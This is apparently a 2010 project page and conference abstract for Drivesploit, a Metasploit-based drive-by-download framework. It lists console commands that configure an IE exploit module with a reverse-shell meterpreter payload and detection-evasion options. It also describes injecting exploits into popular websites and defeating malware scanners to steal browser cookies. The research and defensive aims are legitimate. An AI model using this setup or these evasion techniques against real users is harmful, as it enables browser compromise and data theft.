drivesploit: drive-by download testing framework for metasploit

Please download the slides here: http://www.slideshare.net/wayne_armorize/drivesploit-circumventing-both-automated-and-manual-drivebydownload-detection
Please download the latest source code here: git://github.com/waynearmorize/drivesploit
commands used for this talk:
====
set ConsoleLogging 1
set LogLevel 3
set SessionLogging 1
set DisableCourtesyShell TRUE
use windows/browser/drivesploit_ms10_018_ie_behaviors
set payload windows/meterpreter/reverse_tcp
set SRVPORT 8083
set LHOST 127.0.0.1
set URIPATH /

set ds_random_vars true
set ds_insertion_shellcode true
set ds_concat_all true
====
all commands:
====
set ds_random_vars true
set ds_concat_shellcode true
set ds_insertion_shellcode true
set ds_concat_all true

set ds_enable_fingerprint true
set ds_fingerprint_browser ie6
====
Please use windows/browser/drivesploit_ms10_018_ie_behaviors as reference for developing a drivesploit.

Follow us on twitter: http://twitter.com/drivesploit

Follow the drivesploit blog for news and updates.

Drivesploit will be released at Black Hat and DEF CON 2010 by the Armorize gang.

http://www.blackhat.com/html/bh-us-10/bh-us-10-schedule.html
http://defcon.org/html/defcon-18/dc-18-speakers.html#Huang

This year saw the biggest news in Web security ever: Operation Aurora, which aimed at stealing source code and other intellectual property and succeeded against more than 30 companies, including Google. Incident response showed that the operation involved an IE 0-day drive-by download, resulting in Google's compromise and the leak of source code to jump points in Taiwan. The US Government was so concerned that it issued a demarche to the Chinese government.

Using real, live examples, we will show how easy it is to exploit injection-based, XSS-based, and CSRF-based vulnerabilities in Facebook, Google, Digg, LinkedIn, and other popular websites, and to inject drive-by downloads.

If drive-bys are so easy to inject into high-traffic websites, the question becomes: how easy is it to make them undetectable by automated malware scanning services (such as Google's) and by manual human inspection? We will demonstrate how easy it is to defeat automated detection mechanisms and give an overview of commonly used techniques.

We will reveal for the first time, at this conference, some very advanced techniques that have been almost impossible for automated analysis to overcome in the past, and will remain so now and in the future. We will release Drivesploit, a drive-by download exploit framework implemented on top of Metasploit. We will go into depth on two particular techniques supported by Drivesploit: a) JavaScript obfuscation based on behavior-based fingerprinting, and b) JavaScript timelock puzzles. Live demos will show how these techniques easily defeat both automated AND manual detection.

At the very beginning of our talk, we will give out a digg.com page that we have infected with a drive-by download created with Drivesploit. Visiting this page with the right browser will trigger the exploit and download malware that steals browser cookie files. The whole process will be undetectable by antivirus. The actual JavaScript drive-by code contains a secret phrase. We will give an iPad to whoever in the audience is able to correctly deobfuscate the JavaScript and reveal the secret phrase.

Finally, we will present case studies on the systems and processes that the largest organizations have put in place to fight Web-based malware. We will also present case studies of our incident response efforts with organizations hit by Web malware injections, such as Google's Aurora incident. Based in Taiwan, co-speaker Wayne has been personally involved in such incident response efforts since the late 90's.

All source code for the PoC exploits against Facebook, Google, Digg, LinkedIn, etc., as well as the source code of Drivesploit, will be released as open source at the conference.

Attendees will gain the following:

1. Understanding of drive-by downloads and associated terminology.

2. Information about various drive-by download infection vectors.

3. Appreciation of tools helpful for drive-by analysis, including Malzilla, SpiderMonkey, Rhino, Burp and Wepawet.

4. Understanding of why drive-by downloads are hard to analyze and detect: why antivirus fails, why behavior-based approaches fail, and why even manual efforts are difficult.

5. Learning the Drivesploit framework and how it can be used to develop PoC drive-bys.

6. Learning two new deadly techniques: behavior-based browser fingerprinting and JavaScript timelock puzzles.

7. Learning how to implement the above two using Drivesploit to defeat both automated and manual drive-by analysis.

8. Knowledge of the available countermeasures to this threat.

Project leader:

Wayne Huang
has extensive experience in the security industry and is a frequent speaker at security conferences including RSA (07, 10), SyScan (08, 09), OWASP (08, 09), Hacks in Taiwan (06, 07), WWW (03, 04), PHP (07) and DSN (04). He is the first author to achieve consecutive best paper nominations at the prestigious World Wide Web (WWW) Conferences (2003, 2004), and has co-authored the Web Application Security chapter of "Computer Security in the 21st Century" (Springer US, 2005). Wayne is a PhD candidate in EE at NTU, and received his BS and MS in CS from NCTU.


Project contributors: Antonio Rohman Fernandez, Fyodor Yarochkin, Chris Hsiao